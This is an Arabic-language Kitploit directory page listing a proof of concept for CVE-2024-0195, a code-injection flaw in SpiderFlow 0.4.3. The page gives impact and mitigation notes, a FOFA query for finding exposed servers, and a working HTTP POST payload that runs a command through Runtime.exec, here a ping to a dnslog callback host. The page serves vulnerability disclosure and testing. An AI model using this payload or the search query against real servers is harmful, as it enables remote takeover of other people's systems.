Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0195-SpiderFlow — إثبات مفهوم لاستغلال CVE-2024-0195، وهي ثغرة حقن كود حرجة في SpiderFlow 0.4.3 تمكن من تنفيذ كود عن بُعد عبر نقطة النهاية FunctionService.saveFunction. | Kitploit
أدوات/GitHubGitHub/hack-with-rohit
/
cve-2024-0195-spiderflow
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

إثبات مفهوم لاستغلال CVE-2024-0195، وهي ثغرة حقن كود حرجة في SpiderFlow 0.4.3 تمكن من تنفيذ كود عن بُعد عبر نقطة النهاية FunctionService.saveFunction.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-0195 التحكم غير السليم في إنشاء الكود (حقن الكود) حرج 2024

ملخص

CVE-2024-0195 هي ثغرة حقن كود حرجة في تطبيق الويب spider-flow 0.4.3، وتحديداً في دالة FunctionService.saveFunction في ملف FunctionController.java. يمكن للمهاجم حقن كود خبيث عن بُعد يتم تنفيذه على الخادم. وهذا يسمح بالاختراق الكامل للتطبيق.

التأثير..

هذه الثغرة شديدة الخطورة لأنها تسمح بتنفيذ الأكواد عن بُعد على الخادم الذي يستضيف تطبيق spider-flow المعرض للخطر. يمكن للمهاجم اختراق الخادم بالكامل، وسرقة البيانات الحساسة، وتثبيت البرامج الضارة أو عمال منجم العملات الرقمية، واستخدامه لمزيد من الهجمات داخل الشبكة. تتأثر سرية وسلامة وتوفر التطبيق والخادم بشكل خطير.

التصحيح

لم يتم ذكر إصدار مصحح بشكل صريح، لذلك يبدو أن التصحيح ليس خيارًا متاحًا حاليًا. تم الكشف عن الثغرة بشكل عام وتتوفر استغلالاتها، لذا فإن التخفيف الفوري أمر بالغ الأهمية.

التخفيف

حتى يتم إصدار تصحيح رسمي، يجب إخراج spider-flow 0.4.3 من الخدمة فورًا أو تقييد الوصول إلى الشبكات/المستخدمين الموثوقين فقط. يمكن تهيئة جدران الحماية لتطبيقات الويب أو ضوابط التحقق من الإدخال الأخرى لاكتشاف ومنع محاولات هجمات حقن الكود كإجراء تخفيف مؤقت. ومع ذلك، هذه ليست حلولًا كاملة، ويجب ترقية الإصدار المعرض للخطر بمجرد توفر إصدار مُصلح.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

الاستغلال

FOFA : app="spiderflow"

✔ إثبات المفهوم

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
تنزيل الأداة